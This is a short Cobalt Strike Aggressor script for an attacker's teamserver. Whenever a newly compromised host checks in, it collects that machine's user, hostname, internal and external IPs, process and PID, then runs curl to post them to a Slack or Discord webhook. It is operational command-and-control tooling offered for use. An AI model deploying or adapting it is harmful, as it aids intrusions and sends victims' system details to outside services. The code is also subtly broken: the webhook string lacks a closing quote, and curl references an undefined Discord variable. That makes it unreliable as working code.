# Based on the work of @sec_groundzero which is based on the work of @bluescreenofjeff

$slack_channel = "#cobaltpigeon-notif";
$slack_emoji = ':skeleton:';
$slack_webhookURL = 'https://hooks.slack.com/services/********************;
$teamserver_hostname = 'cobaltpigeon';

on beacon_initial {
        $user = beacon_data($1) ["user"];
        $arch = beacon_data($1) ["barch"];
	$computer = beacon_data($1)["computer"];
	$internal = beacon_data($1)["internal"];
	$external = beacon_data($1)["external"];
	$listener = beacon_data($1)["listener"];
	$process = beacon_data($1)["process"];
	$pid = beacon_data($1)["pid"];
        @curl_command = @('curl','-X','POST','-H','Accept: application/json','-H','Content-Type:application/json','--data','{"content": "Initial Beacon ' . $teamserver_hostname . ', '.$1.' -> '. $user.'@'.$computer.'/'.$internal.'/'.$external.'/'.$listener.'/'.$arch.'/'.$pid.'/'.$process.'"}',$discord_webhookURL);
        exec(@curl_command);
}
